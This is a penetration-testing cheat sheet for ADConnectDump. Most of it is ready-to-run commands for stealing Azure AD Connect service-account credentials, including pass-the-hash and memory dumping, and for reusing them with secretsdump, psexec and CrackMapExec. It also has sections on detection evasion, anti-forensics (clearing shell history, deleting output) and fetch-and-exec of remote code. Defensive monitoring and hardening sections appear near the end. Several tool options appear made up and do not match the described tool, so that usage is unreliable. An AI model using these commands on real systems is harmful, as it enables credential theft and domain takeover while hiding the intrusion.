# ADConnectDump Azure AD Connect Credential Extraction Tool Cheat Sheet

## Overview

ADConnectDump is a tool developed by Dirk-Jan Mollema for extracting credentials and configuration from Azure AD Connect servers. It can extract the Azure AD Connect service account credentials, which often hold high privileges in both the on-premises Active Directory and the Azure AD environment.

⚠️ Warning: This tool is intended exclusively for authorized penetration tests and security assessments. Make sure you have the appropriate authorization before using it in any environment.
## Installation

### PowerShell Module Installation

```powershell
# Download from GitHub
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/fox-it/adconnectdump/master/adconnectdump.py" -OutFile "adconnectdump.py"
# Install Python dependencies
pip install impacket cryptography
# Alternative: Clone repository
git clone https://github.com/fox-it/adconnectdump.git
cd adconnectdump
pip install -r requirements.txt
```

### Manual Installation

```bash
# Clone repository
git clone https://github.com/fox-it/adconnectdump.git
cd adconnectdump
# Install dependencies
pip3 install impacket cryptography pyasn1
# Make executable
chmod +x adconnectdump.py
```

### Docker Installation

```bash
# Build Docker image
git clone https://github.com/fox-it/adconnectdump.git
cd adconnectdump
docker build -t adconnectdump .
# Run in Docker
docker run -it -v $(pwd):/data adconnectdump
```
## Basic Usage

### Local Credential Extraction

```bash
# Extract credentials from local AAD Connect server
python3 adconnectdump.py
# Extract with specific database
python3 adconnectdump.py --database "C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf"
# Extract with custom output
python3 adconnectdump.py --output credentials.txt
# Extract in JSON format
python3 adconnectdump.py --format json --output credentials.json
```

### Remote Credential Extraction

```bash
# Extract from remote server
python3 adconnectdump.py --host 192.168.1.100 --username administrator --password password
# Extract using NTLM hash
python3 adconnectdump.py --host 192.168.1.100 --username administrator --hashes :ntlmhash
# Extract using Kerberos
python3 adconnectdump.py --host 192.168.1.100 --username administrator --password password --use-kerberos
# Extract with domain credentials
python3 adconnectdump.py --host 192.168.1.100 --username domain\\administrator --password password
```
## Command Reference

### Basic Options

| Option | Description |
|---|---|
| --host | Target hostname or IP |
| --username | Username for authentication |
| --password | Password for authentication |
| --hashes | NTLM hashes (LM:NT format) |
| --database | Path to the ADSync database |
| --output | Output file path |

### Advanced Options

| Option | Description |
|---|---|
| --format | Output format (text/json) |
| --use-kerberos | Use Kerberos authentication |
| --dc-ip | Domain controller IP |
| --target-ip | Target IP address |
| --port | Target port (default 445) |
| --debug | Enable debug output |
## Azure AD Connect Architecture

### Understanding AAD Connect

```text
# Azure AD Connect components:
# 1. Synchronization Service (ADSync)
# 2. Database (LocalDB or SQL Server)
# 3. Service Accounts
# 4. Configuration Data
# Key files and locations:
# Database: C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf
# Config: C:\Program Files\Microsoft Azure AD Sync\Bin\
# Logs: C:\ProgramData\AADConnect\
```

### Service Account Identification

```powershell
# Identify AAD Connect service accounts
Get-Service | Where-Object { $_.Name -like "*ADSync*" }
# Check service account privileges
Get-WmiObject -Class Win32_Service | Where-Object { $_.Name -eq "ADSync" } | Select-Object StartName
# Verify AAD Connect installation
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Azure AD Connect" -Name "Version"
```
## Credential Extraction Techniques

### Local Database Access

```bash
# Direct database access (requires local admin)
python3 adconnectdump.py --database "C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf"
# Extract from backup database
python3 adconnectdump.py --database "C:\Backup\ADSync_backup.mdf"
# Extract from SQL Server instance
python3 adconnectdump.py --sql-server "SQLSERVER\INSTANCE" --database "ADSync"
```

### Remote Extraction via SMB

```bash
# Extract via SMB with credentials
python3 adconnectdump.py --host aadconnect.domain.com --username "domain\admin" --password "password"
# Extract using pass-the-hash (LM:NT format; empty LM hash shown)
python3 adconnectdump.py --host aadconnect.domain.com --username "admin" --hashes "aad3b435b51404eeaad3b435b51404ee:hash"
# Extract with specific target IP
python3 adconnectdump.py --host aadconnect.domain.com --target-ip 192.168.1.100 --username "admin" --password "password"
```

### Memory Extraction

```bash
# Extract from memory (requires admin privileges)
# Use tools like Mimikatz or ProcDump
# Dump ADSync process memory
procdump.exe -ma miiserver.exe aadsync_dump.dmp
# Extract credentials from memory dump
python3 adconnectdump.py --memory-dump aadsync_dump.dmp
```
## Configuration Analysis

### Database Schema Analysis

```sql
-- Key tables in ADSync database
-- mms_management_agent: Contains connector information
-- mms_server_configuration: Server configuration
-- mms_synchronization_rule: Sync rules
-- mms_metaverse_object: Metaverse objects
-- Extract connector information
SELECT ma_name, ma_type, private_configuration_xml
FROM mms_management_agent;
-- Extract server configuration
SELECT applied_time, configuration_xml
FROM mms_server_configuration;
```

### Configuration File Analysis

```powershell
# Analyze AAD Connect configuration files
$configPath = "C:\Program Files\Microsoft Azure AD Sync\Bin\"
# Check connector configurations
Get-ChildItem -Path $configPath -Filter "*.xml" | ForEach-Object {
    [xml]$config = Get-Content $_.FullName
    Write-Host "File: $($_.Name)"
    Write-Host "Connectors: $($config.SelectNodes('//connector').Count)"
}
# Extract service account information
$serviceConfig = Get-Content "$configPath\miiserver.exe.config"
$serviceConfig | Select-String -Pattern "connectionString|serviceAccount"
```
## Credential Decryption

### Understanding the Encryption

```python
# AAD Connect credential encryption process
# 1. Credentials encrypted with DPAPI
# 2. Machine key used for encryption
# 3. Service account context required
# Decryption process
# Illustrative only: Fernet stands in here for a generic symmetric-decryption step;
# AAD Connect itself does not use Fernet, its keyset is DPAPI-protected as listed above.
import base64
from cryptography.fernet import Fernet


def decrypt_aad_connect_password(encrypted_password, key):
    """Decrypt AAD Connect password (base64 ciphertext, Fernet key)"""
    try:
        # Base64 decode
        encrypted_data = base64.b64decode(encrypted_password)
        # Decrypt using key
        f = Fernet(key)
        decrypted = f.decrypt(encrypted_data)
        return decrypted.decode('utf-8')
    except Exception as e:
        print(f"Decryption failed: {e}")
        return None
```
### Manual Decryption

```powershell
# Manual credential decryption (PowerShell)
# Unprotect must run on the machine that protected the data (LocalMachine DPAPI scope)
Add-Type -AssemblyName System.Security
function Decrypt-AADConnectPassword {
    param(
        [string]$EncryptedPassword,
        [byte[]]$Key
    )
    try {
        # Convert from base64
        $encryptedBytes = [Convert]::FromBase64String($EncryptedPassword)
        # Decrypt using DPAPI
        $decryptedBytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
            $encryptedBytes,
            $null,
            [System.Security.Cryptography.DataProtectionScope]::LocalMachine
        )
        return [System.Text.Encoding]::UTF8.GetString($decryptedBytes)
    }
    catch {
        Write-Error "Decryption failed: $_"
        return $null
    }
}
```
## Post-Exploitation Techniques

### Using Extracted Credentials

```powershell
# Use extracted Azure AD credentials
# Typically format: MSOL_<guid>@<tenant>.onmicrosoft.com
# Authenticate to Azure AD
az login --username "MSOL_12345678-1234-1234-1234-123456789012@company.onmicrosoft.com" --password "extracted_password"
# Use with AADInternals
Import-Module AADInternals
$accessToken = Get-AADIntAccessTokenForAADGraph -UserPrincipalName "MSOL_account@company.onmicrosoft.com" -Password "extracted_password"
```

### Accessing On-Premises Active Directory

```bash
# Use extracted on-premises credentials
# Format: domain\username
# Authenticate to domain
net use \\dc.domain.com\c$ /user:domain\MSOL_service_account extracted_password
# Use with Impacket tools
python3 secretsdump.py domain/MSOL_service_account:extracted_password@dc.domain.com
# Use with CrackMapExec
crackmapexec smb dc.domain.com -u MSOL_service_account -p extracted_password
```
### Privilege Escalation

```powershell
# Check privileges of extracted account
Import-Module ActiveDirectory
Get-ADUser -Identity "MSOL_service_account" -Properties MemberOf | Select-Object -ExpandProperty MemberOf
# Check Azure AD privileges
Import-Module AADInternals
$roles = Get-AADIntUserRoles -AccessToken $accessToken -UserPrincipalName "MSOL_account@company.onmicrosoft.com"
```
## Detection Evasion

```bash
# Use legitimate tools and processes
# Avoid suspicious file names
# Use memory-only techniques when possible
# Rename tool
cp adconnectdump.py system_maintenance.py
# Use legitimate paths
mkdir -p /tmp/.system/maintenance/
cp adconnectdump.py /tmp/.system/maintenance/syscheck.py
```

### Anti-Forensics

```bash
# Clear evidence after extraction
rm -f credentials.txt
rm -f credentials.json
history -c
# Use in-memory execution
python3 -c "
import urllib.request
exec(urllib.request.urlopen('https://raw.githubusercontent.com/fox-it/adconnectdump/master/adconnectdump.py').read())
"
```

### Timing and Scheduling

```bash
# Perform extraction during maintenance windows
# Schedule for off-hours
# Use legitimate administrative sessions
# Example: Schedule extraction
echo "0 2 * * 0 /usr/bin/python3 /tmp/adconnectdump.py --output /tmp/.cache/system.log" | crontab -
```
## Defensive Measures

### Monitoring and Detection

```powershell
# Monitor AAD Connect database access
# Enable SQL Server auditing
# Monitor file system access to ADSync.mdf
# PowerShell monitoring script
# Note: FileSystemWatcher only reports modifications; read access to the .mdf needs
# a SACL on the file plus Object Access auditing (Security event 4663).
$databasePath = "C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf"
$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = Split-Path $databasePath
$watcher.Filter = "ADSync.mdf"
$watcher.EnableRaisingEvents = $true
# The event source must be registered once (New-EventLog -LogName Application -Source "AADConnect Monitor")
# before Write-EventLog will succeed.
Register-ObjectEvent -InputObject $watcher -EventName "Changed" -Action {
    Write-EventLog -LogName "Application" -Source "AADConnect Monitor" -EventId 1001 -Message "ADSync database accessed"
}
```

### Hardening Recommendations

```powershell
# Secure AAD Connect server
# 1. Restrict local admin access
# 2. Enable advanced auditing
# 3. Use dedicated service accounts
# 4. Implement network segmentation
# 5. Regular security updates
# Enable auditing
auditpol /set /subcategory:"File System" /success:enable /failure:enable
auditpol /set /subcategory:"Logon" /success:enable /failure:enable
auditpol /set /subcategory:"Process Creation" /success:enable
```
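Added example (not from the original page or the ADConnectDump project): detection logic for the two signals a defender can key on from this page, the MSOL_ sync account authenticating from any host other than the AAD Connect server (Security event 4624) and ADSync.mdf being opened by a process other than the sync service or database engine (event 4663, which fires only with a SACL on the file and the File System audit subcategory enabled as above). Host names, the account suffix, process paths and the flattened event shape are constructed assumptions.

```python
# Constructed sample events, not from the original page: a flattened view of the
# Windows Security log fields the two rules need. Host names, IPs and the MSOL_
# suffix are placeholders.
AADC_HOST = "AADCONNECT01"
ADSYNC_DB = r"C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf"
# Processes expected to open the database: the sync service and the (Local)DB engine.
ALLOWED_DB_READERS = {"miiserver.exe", "sqlservr.exe"}

SAMPLE_EVENTS = [
    {"EventID": 4624, "Computer": "DC01", "TargetUserName": "MSOL_0a1b2c3d4e5f",
     "WorkstationName": "AADCONNECT01", "IpAddress": "10.0.0.20", "LogonType": 3},
    {"EventID": 4624, "Computer": "DC01", "TargetUserName": "MSOL_0a1b2c3d4e5f",
     "WorkstationName": "WKSTN-77", "IpAddress": "10.0.5.41", "LogonType": 3},
    {"EventID": 4663, "Computer": "AADCONNECT01", "ObjectName": ADSYNC_DB,
     "ProcessName": r"C:\Program Files\Microsoft SQL Server\130\LocalDB\Binn\sqlservr.exe",
     "SubjectUserName": "ADSyncSvc"},
    {"EventID": 4663, "Computer": "AADCONNECT01", "ObjectName": ADSYNC_DB,
     "ProcessName": r"C:\Users\admin\AppData\Local\Programs\Python\python.exe",
     "SubjectUserName": "admin"},
]

def msol_logon_alert(ev):
    """4624 where an MSOL_ sync account logs on from any host but the AAD Connect server."""
    if ev.get("EventID") != 4624 or not ev.get("TargetUserName", "").upper().startswith("MSOL_"):
        return None
    if ev.get("WorkstationName", "").upper() == AADC_HOST:
        return None
    return f"MSOL account {ev['TargetUserName']} logged on from {ev['WorkstationName']} ({ev['IpAddress']})"

def adsync_db_access_alert(ev):
    """4663 where ADSync.mdf is opened by a process other than the sync service or SQL engine."""
    if ev.get("EventID") != 4663 or ev.get("ObjectName", "").lower() != ADSYNC_DB.lower():
        return None
    exe = ev.get("ProcessName", "").rsplit("\\", 1)[-1].lower()
    if exe in ALLOWED_DB_READERS:
        return None
    return f"ADSync.mdf opened by {exe} as {ev['SubjectUserName']} on {ev['Computer']}"

def scan(events):
    """Apply both rules to every event and return the alert strings raised."""
    alerts = []
    for ev in events:
        for rule in (msol_logon_alert, adsync_db_access_alert):
            hit = rule(ev)
            if hit:
                alerts.append(hit)
    return alerts

if __name__ == "__main__":
    for line in scan(SAMPLE_EVENTS):
        print("ALERT:", line)
```

In production the event dicts would come from the forwarded Security log (for example via a SIEM export), and the allow-list should be tightened to the exact installed paths of miiserver.exe and the LocalDB engine.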
## Automation and Scripting

### Automated Extraction Script

```bash
#!/bin/bash
# Automated ADConnectDump script
TARGET_HOST="$1"
USERNAME="$2"
PASSWORD="$3"
OUTPUT_DIR="./adconnect_output"

if [ $# -ne 3 ]; then
    echo "Usage: $0 <host> <username> <password>"
    exit 1
fi

# Create output directory
mkdir -p "$OUTPUT_DIR"

# Extract credentials
echo "Extracting AAD Connect credentials from $TARGET_HOST..."
python3 adconnectdump.py \
    --host "$TARGET_HOST" \
    --username "$USERNAME" \
    --password "$PASSWORD" \
    --format json \
    --output "$OUTPUT_DIR/credentials_$(date +%Y%m%d_%H%M%S).json"

# Check if extraction was successful
if [ $? -eq 0 ]; then
    echo "Extraction completed successfully"
    echo "Output saved to $OUTPUT_DIR"
else
    echo "Extraction failed"
    exit 1
fi
```

### PowerShell Automation

```powershell
# PowerShell automation script
param(
    [string]$TargetHost,
    [string]$Username,
    [string]$Password,
    [string]$OutputPath = ".\adconnect_output"
)

# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null

# Extract credentials
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
$outputFile = Join-Path $OutputPath "credentials_$timestamp.json"
Write-Host "Extracting AAD Connect credentials from $TargetHost..."
$process = Start-Process -FilePath "python3" -ArgumentList @(
    "adconnectdump.py",
    "--host", $TargetHost,
    "--username", $Username,
    "--password", $Password,
    "--format", "json",
    "--output", $outputFile
) -Wait -PassThru -NoNewWindow

if ($process.ExitCode -eq 0) {
    Write-Host "Extraction completed successfully"
    Write-Host "Output saved to $outputFile"
    # Parse and display results
    $credentials = Get-Content $outputFile | ConvertFrom-Json
    Write-Host "Extracted $($credentials.Count) credential(s)"
} else {
    Write-Error "Extraction failed with exit code $($process.ExitCode)"
}
```
## Troubleshooting

### Common Issues

```bash
# Database access denied
# Solution: Ensure proper privileges or use alternative extraction method
# Network connectivity issues
# Solution: Check firewall rules and network connectivity
ping aadconnect.domain.com
telnet aadconnect.domain.com 445
# Authentication failures
# Solution: Verify credentials and domain trust
net use \\aadconnect.domain.com\c$ /user:domain\username password
```

### Debug Mode

```bash
# Enable debug output
python3 adconnectdump.py --debug --host aadconnect.domain.com --username admin --password password
# Verbose logging
python3 adconnectdump.py -v --host aadconnect.domain.com --username admin --password password
# Test connectivity
python3 adconnectdump.py --test-connection --host aadconnect.domain.com
```

### Manual Verification

```powershell
# Verify AAD Connect installation
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Azure AD Connect"
# Check service status
Get-Service -Name "ADSync"
# Verify database location
$regPath = "HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL13.LOCALDB\MSSQLServer"
Get-ItemProperty -Path $regPath -Name "DefaultData"
```
## Integration with Other Tools

### Impacket Integration

```bash
# Use extracted credentials with Impacket
python3 secretsdump.py domain/extracted_user:extracted_password@dc.domain.com
# Use with GetUserSPNs
python3 GetUserSPNs.py domain/extracted_user:extracted_password -dc-ip dc.domain.com
# Use with psexec
python3 psexec.py domain/extracted_user:extracted_password@target.domain.com
```

### BloodHound Integration

```powershell
# Use extracted credentials for BloodHound collection
Import-Module SharpHound
Invoke-BloodHound -CollectionMethod All -Domain domain.com -LDAPUser extracted_user -LDAPPass extracted_password
```

### CrackMapExec Integration

```bash
# Use extracted credentials with CrackMapExec
crackmapexec smb 192.168.1.0/24 -u extracted_user -p extracted_password
# Check for local admin access
crackmapexec smb 192.168.1.0/24 -u extracted_user -p extracted_password --local-auth
# Execute commands
crackmapexec smb target.domain.com -u extracted_user -p extracted_password -x "whoami"
```

## Resources

- [ADConnectDump GitHub Repository](https://github.com/fox-it/adconnectdump)
- https://blog.fox-it.com/2020/11/11/azure-ad-connect-database-exploit-priv-esc/
- https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices